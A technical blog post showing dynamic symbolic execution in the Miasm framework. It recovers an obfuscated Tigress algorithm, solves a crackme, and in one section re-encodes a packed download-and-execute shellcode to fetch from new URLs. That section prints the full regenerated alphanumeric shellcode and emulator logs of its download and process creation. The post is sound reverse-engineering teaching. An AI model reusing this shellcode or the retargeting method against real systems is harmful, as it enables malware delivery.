Playing with Dynamic symbolic execution
Dynamic symbolic execution (DSE) is a powerful and trendy method. It has been used for several tasks, such as:
- Code coverage
- Input and test-case generation
- Exploit generation
- Directed fuzzing
- Out-of-bound access checking
- Automatic crackme solving
- Reconstruction of algorithm
- Deobfuscation
- …
Miasm is not the first tool to implement this feature. But, well, as the tool already had everything needed to implement DSE, it was just a matter of time before having these feature landed in the main branch.
This post is about how one can easily use DSE in his scripts through a few usage examples and a simple API:
- Recovering an algorithm from an obfuscated program
- Reusing a packer without reversing it
- Automatically breaking a crackme
Overview:
This analysis is based on Miasm revision 1fb3326.
Crash course on DSE
Dynamic symbolic execution (DSE, also called concolic execution), is just about running a symbolic execution alongside a concrete one. This way, the symbolic execution can benefit from the concrete path to avoid the explosion of the number of possible paths (in loops), concrete value when equation becomes too complex or syscall resulting values.
Only one path is considered at a given time, but the constraints on inputs can be accumulated along the path and then inverted to produce new inputs reaching new code.
Following is an informal introduction to DSE through an example.
Consider the following code:
int func(int arg) {
arg += 1;
if (arg & 0xFF == 0x12) {
arg += 13;
}
return arg;
}
Let’s consider a first execution with the arbitrary concrete value arg = 0.
Line | Pseudo-IR | Concrete state |
---|---|---|
0 | ARG = ARG + 1 | ARG = 1 |
1 | (ARG & 0xFF == 0x12) ? 2 : 4 | Go to 4 |
4 | RETURN ARG | Return 1 |
Now, if we consider a fully symbolic execution, we get:
- 0: ARG = ARG + 1
- 1: (ARG & 0xFF == 0x12) ? 2 : 4 -> unsolvable condition!
The symbolic execution is unable to run to the end of the function. Actually, other techniques could be considered, such as multi-path symbolic execution, but this is not the point of this example.
Here, by using the aforementioned concrete execution, we have an example of possible condition output (i.e. a possible path) when not taking the condition.
Integrating this information into the symbolic execution state, we choose not to take the condition, i.e. assuming that (ARG & 0xFF == 0x12) is not true, or (ARG & 0xFF != 0x12). Let’s call it a constraint.
The execution finally ends, returning ARG + 1. Now, we can say that this code snippet return ARG + 1 when (ARG & 0xFF != 0x12). Remember we don’t even look at the code and it could have been obfuscated.
But wait, there is more. We can invert the constraint on our path, for instance by using a SMT solver. Let’s say the solver yields ARG = 0x123412, which does satisfy (ARG & 0xFF == 0x12).
By playing this input, we now obtain a new path and a new result: this code snippet returns ARG + 14 if (ARG & 0xFF == 0x12). And this is how one can generate new input to reach new code areas in a program. This method has been used by most of the top teams in the Cyber Grand Challenge contest to enhance fuzzing by crafting new inputs reaching code areas yet un-fuzzed. Indeed, fuzzers are extremely fast at testing inputs, but they get stuck on “complex conditions”, such as a comparision with a multi-byte magic value. Fortunately, this is exactly what the DSE is good at.
TigressVM
Let’s apply this technique to recover an algorithm that has been obfuscated. This example comes from J. Salwan results on Tigress.
The challenge is made of few programs, taking an input as command line argument and outputting a value based on the input and an unknown algorithm.
Running the program
First, let’s write a script to run the program with Miasm. Thanks to PR #515, a tiny environment can now be simulated for Linux binaries.
from miasm2.analysis.sandbox import Sandbox_Linux_x86_64
# Create sandbox
parser = Sandbox_Linux_x86_64.parser(description="ELF sandboxer")
parser.add_argument("filename", help="ELF Filename")
options = parser.parse_args()
# Force environment simulation
options.mimic_env = True
# Dummy argument: 123456789
options.command_line = ["".join(chr(0x30 + i) for i in xrange(1, 10))]
# Instantiate and run
sb = Sandbox_Linux_x86_64(options.filename, options, globals())
sb.run()
Launching it, we obtain an error, as strtoul stub is not yet implemented:
$ python tigress.py tigress-0-challenge-0
[INFO]: xxx___libc_start_main(main=0x4005f4, argc=0x2, ubp_av=0x13ffc4, init=0x400ca0, fini=0x400d30, rtld_fini=0x0, stack_end=0x13ffb8) ret addr: 0x400539
ValueError: ('unknown api', '0x71111012L', "'xxx_strtoul'")
So let’s implement a tiny version of strtoul:
def xxx_strtoul(jitter):
ret_ad, args = jitter.func_args_systemv(["nptr", "endptr", "base"])
assert args.endptr == 0
content = jitter.get_str_ansi(args.nptr)
value = int(content, args.base)
print "%r -> %d" % (content, value)
jitter.func_ret_systemv(ret_ad, value)
Now, strtoul runs just fine, but we ends on a memory error. Indeed, the function is using stack canaries, so we have to simulate it (segmentation + memory page):
from miasm2.jitter.csts import PAGE_READ
...
# Init stack canary
sb.jitter.ir_arch.do_all_segm = True
FS_0_ADDR = 0x7ff70000
sb.jitter.cpu.FS = 0x4
sb.jitter.cpu.set_segm_base(sb.jitter.cpu.FS, FS_0_ADDR)
sb.jitter.vm.add_memory_page(
FS_0_ADDR + 0x28, PAGE_READ, "\x42\x42\x42\x42\x42\x42\x42\x42", "Stack canary FS[0x28]")
We also need to support 128bits operations, so we will use the llvm jitter (python one also works, but is slower).
options.jitter = "llvm"
The simulation is working end to end:
$ python tigress.py tigress-0-challenge-0
[INFO]: xxx___libc_start_main(main=0x4005f4, argc=0x2, ubp_av=0x13ffc4, init=0x400ca0, fini=0x400d30, rtld_fini=0x0, stack_end=0x13ffb8) ret addr: 0x400539
[INFO]: xxx_strtoul(nptr=0x13ffec, endptr=0x0, base=0xa) ret addr: 0x400660
'123456789' -> 123456789
[INFO]: xxx_printf(fmt=0x400dbd) ret addr: 0x4006b4
8131652486802131118
$ ./tigress-0-challenge-0 123456789
8131652486802131118
Adding DSE
Now, we want to obtain the equation of the output based on the input.
In other words, we will “symbolize” the value returned by strtoul, and retrieve the equation of the second argument of printf.
To do so, we will attach a DSE engine to the jitter after the end of strtoul. Once attached, Miasm will automatically inform the symbolic engine about the concrete state, accumulate constraints, check that the symbolic execution does not differ from this concrete state, etc.
First, we instanciate a DSEEngine object and ask it to stub external APIs (the same way the Sandbox does).
from miasm2.analysis.dse import DSEEngine
dse = DSEEngine(sb.machine)
dse.add_lib_handler(sb.libs, globals())
Now, we attach the DSE object to the jitter after the end of strtoul, set all register values to concrete ones (we don’t want to track them) and set the returned value to a symbol.
from miasm2.expression.expression import ExprId
VALUE = ExprId("VALUE", 64)
def xxx_strtoul(jitter):
global dse
...
jitter.func_ret_systemv(ret_ad, value)
dse.attach(jitter)
dse.update_state_from_concrete()
dse.update_state({
dse.ir_arch.arch.regs.RAX: VALUE,
})
Now, we notice the script takes more time to execute. It ends on a error, looking for xxx_printf_symb, the symbolic stub of “printf”.
No need to worry, we just want to inspect its second argument.
def xxx_printf_symb(dse):
result = dse.eval_expr(dse.ir_arch.arch.regs.RSI)
print result
raise RuntimeError("Exit")
And we obtain this ugly equation:
({(VALUE+(VALUE|(VALUE+0x34D870D1)|0xFFFFFFFFD9FCA98B)+0x34D870D1) 0 64, ((VALUE+(VALUE|(VALUE+0x34D870D1)|0xFFFFFFFFD9FCA98B)+0x34D870D1)[63:64]?(0xFFFFFFFFFFFFFFFF,0x0)) 64 128}*{({((((((VALUE|0x46BC480) << ({(((VALUE+0x34D870D1)&0x7)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F))&0x3F) << 0x4)|((VALUE+0x1DD9C3C5) << ({((- ((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1))+0x40)[0:8] 0 8, 0x0 8 64}&0x3F))|((VALUE+0x1DD9C3C5) >> ({((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F)))*0x2C7C60B7) 0 64, (((((((VALUE|0x46BC480) << ({(((VALUE+0x34D870D1)&0x7)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F))&0x3F) << 0x4)|((VALUE+0x1DD9C3C5) << ({((- ((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1))+0x40)[0:8] 0 8, 0x0 8 64}&0x3F))|((VALUE+0x1DD9C3C5) >> ({((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F)))*0x2C7C60B7)[63:64]?(0xFFFFFFFFFFFFFFFF,0x0)) 64 128}*{(VALUE|0x46BC480) 0 64, ((VALUE|0x46BC480)[63:64]?(0xFFFFFFFFFFFFFFFF,0x0)) 64 128})[0:64] 0 64, (({((((((VALUE|0x46BC480) << ({(((VALUE+0x34D870D1)&0x7)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F))&0x3F) << 0x4)|((VALUE+0x1DD9C3C5) << ({((- ((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1))+0x40)[0:8] 0 8, 0x0 8 64}&0x3F))|((VALUE+0x1DD9C3C5) >> ({((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F)))*0x2C7C60B7) 0 64, (((((((VALUE|0x46BC480) << ({(((VALUE+0x34D870D1)&0x7)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F))&0x3F) << 0x4)|((VALUE+0x1DD9C3C5) << ({((- ((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1))+0x40)[0:8] 0 8, 0x0 8 64}&0x3F))|((VALUE+0x1DD9C3C5) >> ({((((VALUE+0x34D870D1)*0x38BCA01F)&0xF)|0x1)[0:8] 0 8, 0x0 8 64}&0x3F)))*0x2C7C60B7)[63:64]?(0xFFFFFFFFFFFFFFFF,0x0)) 64 128}*{(VALUE|0x46BC480) 0 64, ((VALUE|0x46BC480)[63:64]?(0xFFFFFFFFFFFFFFFF,0x0)) 64 128})[63:64]?(0xFFFFFFFFFFFFFFFF,0x0)) 64 128})[0:64]
We can evaluate it with VALUE = 123456789 and assert that it is identical to the concrete result:
from miasm2.expression.expression import ExprId, ExprInt
...
def xxx_printf_symb(dse):
result = dse.eval_expr(dse.ir_arch.arch.regs.RSI)
print result
obtained = dse.symb.expr_simp(result.replace_expr({VALUE: ExprInt(123456789, 64)}))
print obtained
assert int(obtained) == sb.jitter.cpu.RSI
raise RuntimeError("Exit")
And TADA! We do obtain the same result, the equation is valid for this input.
Using this same script, and the tests that J. Salwan used to validate his results, we sensibly obtain the same accuracy (given the random factor of tests) on the different binaries tested. For instance, on the first 2 challenges (next ones imply signal handling, which we will not introduce here for the sake of simplicity):
Challenge-0 | Challenge-1 | Challenge-2 | Challenge-3 | Challenge-4 | |
---|---|---|---|---|---|
VM 0 | 100.00% | 100.00% | 43.12% | 100.00% | 89.85% |
VM 1 | 100.00% | 41.10% | 100.00% | 100.00% | 100.00% |
Going further
As expected, our formula is not valid for some inputs in VM-0 Challenge-2.
By replacing the DSEEngine class by the DSEPathConstraint one from the same module, we can ask Miasm to track the constraint along the path.
from miasm2.analysis.dse import DSEPathConstraint
dse = DSEPathConstraint(sb.machine)
These constraints are accumulated in an z3.Solver object, accessible through dse.cur_solver (and then dse.cur_solver.assertions).
But this object can do more: depending on the value of its option produce_solution:
- PRODUCE_SOLUTION_CODE_COV
- PRODUCE_SOLUTION_BRANCH_COV,
- PRODUCE_SOLUTION_PATH_COV
it will try to produce new counter-example for respectively each untaken basic block, CFG branch, CFG path.
By default, this method accumulates couples of (solution identifier, corresponding input) in an attribute named new_solutions.
These strategies can be extended by overriding the methods produce_solution (should the solver be called for this instance? ) and handle_solution (how the resulting solver model should be translated into a new solution? ).
So, for this example, after running the script with the default option, code coverage, we obtain couple of (new destination, associated solution):
>>> dse.new_solutions
{
ExprInt(0x4007D4, 64): set([[VALUE = 60813477099536420]]),
ExprInt(0x4007BF, 64): set([[VALUE = 15749087897455188096],
[VALUE = 633318710181888]])
}
And indeed, we can verify that our previous formula outputs the wrong value for these inputs, except for 633318710181888 (two different paths can lead to the same solution).
To go further, the associated constraints (the if (cond) affecting the resulting formula) can be retrieved by overriding handle_solution and looking for the path constraints, and the corresponding formula by replaying a new emulation with these new values. The example example/symbol_exec/dse_strategies.py can be used as a starting point.
In the context of fuzzing, we would just use these values as new inputs to potentially reach new code areas.
Inversing a shellcode packer
Remember this shellcode?
As a reminder, this shellcode is fully alphanumeric. It actually brings a generic self-modifying stub which will unpack the final shellcode in-place.
This stub uses two deciphering loops before jumping on the payload, the original shellcode, a download-and-execute.
Spoiler: we will use DSE to obtain a similarly looking shellcode, but downloading from a controlled URL instead! Here we come, attribution dice.
First, let’s have a running script for the shellcode (at least until the original entry point is reached):
from miasm2.analysis.machine import Machine
from miasm2.jitter.csts import PAGE_READ, PAGE_WRITE
# Init and map the shellcode
data = open("shellcode.bin").read()
machine = Machine("x86_32")
jitter = machine.jitter()
addr_sc = 0x400000
jitter.vm.add_memory_page(addr_sc, PAGE_READ|PAGE_WRITE, data, "Shellcode")
# Init environment: stack, and EAX on the entry_point
jitter.init_stack()
jitter.cpu.EAX = addr_sc
# Add a breakpoint before the OEP
def jump_on_oep(jitter):
print "OEP reached!"
return False
jitter.add_breakpoint(addr_sc + 0x4b, jump_on_oep)
# Launch the jitter
jitter.init_run(addr_sc)
jitter.continue_run()
Now, let’s retrieve the equation of the resulting memory cells as a function of the initial state. For this, we will use the DSE engine, and symbolize the initial shellcode bytes in memory. The memory range to symbolize can be specified through symbolize_memory with the targeted interval.
from miasm2.analysis.dse import DSEEngine
from miasm2.core.interval import interval
...
# Init the dse
dse = DSEEngine(machine)
# Add a breakpoint before the OEP
...
# Init jitter context and DSE
jitter.init_run(addr_sc)
dse.attach(jitter)
dse.update_state_from_concrete()
dse.symbolize_memory(interval([(addr_sc, addr_sc + len(data) - 1)]))
# Launch the jitter
jitter.continue_run()
The equation of the 0x42th byte can now be obtained with:
from miasm2.expression.expression import *
print dse.eval_expr(ExprMem(ExprInt(addr_sc + 0x42, 32), 8))
Which give: (MEM_0x400053^(MEM_0x400052*0x10))
MEM_<addr> are the symbols created by the DSE engine to represent the symbolic memory at addr. The symbol can be obtained through dse.memory_to_expr(addr).
From our previous analysis, we know that the final memory consists of the stub, the download-execute payload, the list of null-byte terminated URLs in unicode, and garbage.
For our purpose, we will keep the final payload and only update the URLs. In other words, we will constrain the final state to be equal to the one in memory for the first 0x368 byte (stub + payload), and then our URLs.
To do so, we first switch to a DSEPathConstraint object, to conserve the constraint induced by the path.
from miasm2.analysis.dse import DSEPathConstraint
...
dse = DSEPathConstraint(machine, produce_solution=False)
Then, we build our expected memory layout, with our URLs:
...
jitter.continue_run()
# Force final state
memory = jitter.vm.get_mem(addr_sc, 0x368)
# > url == garbage
urls = ["https://miasm.re/1", "https://github.com/cea-sec/miasm"]
memory += "\x00".join(urls) + "\x00\x00"
As a remark, one can note that this same script can be used to modify the payload…
Now, we constraint the final state to correspond to our memory layout:
for i, c in enumerate(memory):
addr = addr_sc + i
exp = ExprMem(ExprInt(addr, 32), 8)
value = ExprInt(ord(c), 8)
eq = dse.eval_expr(exp)
# Constraint the result of the equation at address "addr" (in "eq") to be
# equal to our custom memory byte "value"
eaff = ExprAff(eq, value)
dse.cur_solver.add(dse.z3_trans.from_expr(eaff))
And this is it! At this stage we can ask the solver for a solution:
dse.cur_solver.check()
model = dse.cur_solver.model()
out = ""
for addr in xrange(addr_sc, addr_sc + len(data)):
x = model.eval(dse.z3_trans.from_expr(dse.memory_to_expr(addr)))
try:
out += chr(x.as_long())
except:
# No constraint on this input, let's use an arbitrary value
out += "A"
But wait: if we look at the bytes in our solution, they are not limited to alphanumeric!
Indeed, we never constrained our input to be in alphanumeric range. We can easily solve this situation:
import z3
def force_alphanum(x):
""" Force x in [A-Za-z0-9] """
constraint = []
# Integer
constraint.append(z3.And(x <= ord('9'), x >= ord('0')))
# Uppercase
constraint.append(z3.And(x <= ord('Z'), x >= ord('A')))
# Lowercase
constraint.append(z3.And(x <= ord('z'), x >= ord('a')))
return z3.Or(*constraint)
...
# Force alphanum
for addr in xrange(addr_sc, addr_sc + len(data)):
z3_addr = dse.z3_trans.from_expr(dse.memory_to_expr(addr))
dse.cur_solver.add(force_alphanum(z3_addr))
# Get the solution
...
And we finally obtain our freshly crafted shellcode:
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
Using the script from the previous article, we can verify that our shellcode is working:
...
[INFO]: urlmon_URLDownloadToCacheFileW(0x0, 0x20000000, 0x20000018, 0x1000, 0x0, 0x0) ret addr: 0x401161
https://miasm.re/1
[INFO]: kernel32_CreateProcessW(0x20000018, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x13ff88, 0x13ff78) ret addr: 0x4012c5
...
[INFO]: urlmon_URLDownloadToCacheFileW(0x0, 0x20000000, 0x20000026, 0x1000, 0x0, 0x0) ret addr: 0x401161
https://github.com/cea-sec/miasm
[INFO]: kernel32_CreateProcessW(0x20000026, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x13ff88, 0x13ff78) ret addr: 0x4012c5
...
Et voila!
Remember, no (too much) magic here: this is a straightforward unpacking stub, without heavy control flow relying on data flow. For instance, a stub using compression would not be such a piece of cake.
Enhancing coverage - breaking a crackme
The target example is example/samples/dse_crackme.c, using the associated script example/symbol_exec/dse_crackme.py.
Overview
Briefly, this crackme loads a key from a file, and applies several tests on it. These tests include:
- a limit on the length of the file
- an arithmetic overflow test (2 * buf[7] == 14) && (buf[7] != 7)
- a magic value test (unsuitable for unassisted fuzzer)
- a CRC16, using a table based implementation
The goal is to obtain the final “OK”.
We will use a common coverage enhancing strategy:
- Play an input candidate
- Record which branch has not be taken, and their associated constraints
- Resolve and produce a new candidate for these branches
- Restart at 1.
This way, the input will progressively evolve to reach new basic blocks inside the program (ie. be successful on more and more tests).
The script dse_crackme.py first implements the code for the sample to run, which is out of the scope of this post.
Building new input
As before, we will use the DSE engine to track the path constraints, with the now familiar code:
# Instanciate the DSE engine
machine = Machine("x86_64")
dse = DSE(machine)
# Attach to the jitter
dse.attach(sb.jitter)
# Update the jitter state. df is read, but never set
# Approaches: specific or generic
# - Specific:
# df_value = ExprInt(sb.jitter.cpu.df, dse.ir_arch.arch.regs.df.size)
# dse.update_state({
# dse.ir_arch.arch.regs.df: df_value
# })
# - Generic
dse.update_state_from_concrete()
At this stage, launching the emulation will result in a jump to an unknown address. Indeed, in the concrete execution, the call to __libc_start_main is stubbed (see miasm2/os_dep/linux_stdlib.py). But a symbolic version is also needed for the DSE to work.
Here, we implement a naive version of this function. As a naming convention, we use the equivalent concrete name with a “_symb” suffix.
def xxx___libc_start_main_symb(dse):
# ['RDI', 'RSI', 'RDX', 'RCX', 'R8', 'R9']
# main, argc, argv, ...
regs = dse.ir_arch.arch.regs
top_stack = dse.eval_expr(regs.RSP)
main_addr = dse.eval_expr(regs.RDI)
argc = dse.eval_expr(regs.RSI)
argv = dse.eval_expr(regs.RDX)
hlt_addr = ExprInt(0x1337beef, 64)
dse.update_state({
ExprMem(top_stack, 64): hlt_addr,
regs.RDI: argc,
regs.RSI: argv,
dse.ir_arch.IRDst: main_addr,
dse.ir_arch.pc: main_addr,
})
The function can be registered to the __libc_start_main address through add_handler (equivalent to add_breakpoint in concrete mode).
But to ease the workflow, we can use:
# Register symbolic stubs for extern functions (xxx_puts_symb, ...)
dse.add_lib_handler(sb.libs, globals())
With this line, Miasm will automatically register handlers for imports, using functions defined in the current script. Again, this is the same mechanism as the one used by Sandbox for concrete function stubbing.
Continuing our execution, we now need FILE related functions. We define a SymbolicFile class, which supports read operation with a concrete size and nmemb argument, and return symbolic byte.
We also implement the associated functions:
- xxx_fopen_symb
- xxx_fread_symb
- xxx_fclose_symb
Being quite straightforward, their implementations are not described here. Basically, reading the file will return symbolic bytes, and the file size is symbolic too.
At the end, puts is called to display “BAD” or “OK”. Once this function has been reached, the execution can stop.
To do so, and to keep the final result (ie. “BAD” or “OK”), an exception is raised in the puts stub.
# Stop the execution on puts and get back the corresponding string
class FinishOn(Exception):
def __init__(self, string):
self.string = string
super(FinishOn, self).__init__()
def xxx_puts_symb(dse):
string = dse.jitter.get_str_ansi(dse.jitter.cpu.RDI)
raise FinishOn(string)
Now, we are able to run the DSE from the beginning of the program until the final puts. The next step is the generation of a new input.
When the DSEPathConstraint object is able to solve a constraint to reach a new branch, its function handle_solution is called. This function receives the associated z3 model and the new destination. One solution could be to override this method to produce our new solution.
We could also use the model associated to each new solution in the new_solutions attribute (see above).
We can then re-use already existing strategy to generate candidates. For instance, let’s use a code coverage strategy which will produce inputs to reach block we never explored before:
strategy = DSEPathConstraint.PRODUCE_SOLUTION_CODE_COV
# Other possibilities:
# strategy = DSEPathConstraint.PRODUCE_SOLUTION_BRANCH_COV,
# strategy = DSEPathConstraint.PRODUCE_SOLUTION_PATH_COV
dse = DSEPathConstraint(machine, produce_solution=strategy)
At the end of the execution, we will have to build the file content corresponding to the computed solutions (values of the new_solutions attribute), and save them for later.
finfo = FILE_to_info_symb[FILE_stream]
for sol_ident, model in dse.new_solutions.iteritems():
# Build the file corresponding to solution in 'model'
out = ""
fsize = max(model.eval(dse.z3_trans.from_expr(FILE_size)).as_long(),
len(finfo.gen_bytes))
for index in xrange(fsize):
try:
byteid = finfo.gen_bytes[index]
out += chr(model.eval(dse.z3_trans.from_expr(byteid)).as_long())
except (KeyError, AttributeError) as _:
# Default value if there is no constraint on current byte
out += "\x00"
# Save solution for later use
todo.add(out)
At this point, we can run the binary for a given file content, and generate new candidates for each new possible branch.
Automatic exploration
What we just need to do now is the automatic exploration of all the solutions. To do so, we will need to restore the state between two experiment.
The associated DSE functionnality is the snapshot feature. As we want to keep already produced solutions - avoid producing solution for already explored basic blocks - the keep_known_solutions option is set:
## Save the current clean state, before any computation of the FILE content
snapshot = dse.take_snapshot()
...
dse.restore_snapshot(snapshot, keep_known_solutions=True)
So, we start with an empty file:
todo = set([""]) # Set of file contents to test
And now, while candidates remain, we:
- Get a file content candidate
- Print it to observe their evolution
- Restore the clean state
- Run the program with DSE attached
At the end, if we reached a valid solution, we break. Otherwise, we add the new input to the set of candidate and restart from 1.
The associated code is as simple as:
while todo:
# Prepare a solution to try, based on the clean state
file_content = todo.pop()
print "CUR: %r" % file_content
open(TEMP_FILE.name, "w").write(file_content)
dse.restore_snapshot(snapshot, keep_known_solutions=True)
FILE_to_info.clear()
FILE_to_info_symb.clear()
# Play the current file
try:
sb.run()
except FinishOn as finish_info:
print finish_info.string
if finish_info.string == "OK":
# Stop if the expected result is found
found = True
break
# Get new candidates
finfo = FILE_to_info_symb[FILE_stream]
for sol_ident, model in dse.new_solutions.iteritems():
# Build the file corresponding to solution in 'model'
...
todo.add(out)
Launching the final script, we obtain:
CUR: ''
BAD
CUR: '\x00'
BAD
CUR: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
BAD
CUR: 'M\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
BAD
CUR: 'M\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00'
BAD
CUR: 'M\x00\x00\x00\x00\x00\x00\x87\x00\x00\x00\x00\x00\x00\x00'
BAD
CUR: 'M!@$M\x00\x00\x87\x00\x00\x00\x00\x00\x00\x00'
BAD
CUR: 'M!@$MN\x0e\x87\xb1}\nN\xc60\xe7'
OK
FOUND !
One can observe the different aforementioned checks:
- check on the file size
- check on the first byte (equal to ‘M’)
- check for the overflow, in two separated tests (x != 7, 2 * x == 14)
- check for the magic value
- check for the CRC16 (must be equal to 1337)
We can launch the obtained result to check it:
$ hexdump -C test.txt
00000000 4d 21 40 24 4d 4e 0e 87 b1 7d 0a 4e c6 30 e7 |M!@$MN...}.N.0.|
$ gcc dse_crackme.c -o dse_crackme
$ ./dse_crackme test.txt
OK
And we have the correct solution!
Here, the code coverage strategy is enough; this may not always be the case. If this strategy, the cheapest one, is not sufficient, more powerful and costly strategies such as branch and path coverage can be used. To do so, one only needs to modify the produce_solution argument of DSEPathConstraint instance creation.
As a side note / for those interested by the internals, you may noticed that the CRC16 used is a table based one. As a result, some of the constraints to solve look like:
@16[table_offset + symbolic_element] == CST
So we need to ask z3 to solve a constraint involving a symbolic lookup. To do so, z3 needs to known the table values.
To achieve this, we use the Miasm expr_range utility to obtain the interval of addresses reachable through this lookup. If this interval is not too large, we add a constraint on the memory content to z3 (ie. @16[table_offset + 2] == 0x1021, etc.).
This can be done because addresses are kept symbolic. This is not the approach chosen by some other frameworks, for performance reasons. To mimic this behavior in Miasm, address lookups could just be replaced with their concrete value in DSE.handle method.
Final thoughts
This post depicts a brief overview on what DSE can achieve.
The Miasm implementation has been done with flexibility in mind; one should not hesitate to tweek it to suit his needs. In addition, DSE can be added to existing script in just a few lines. It may prove to be a powerful method in a reversing toolbox.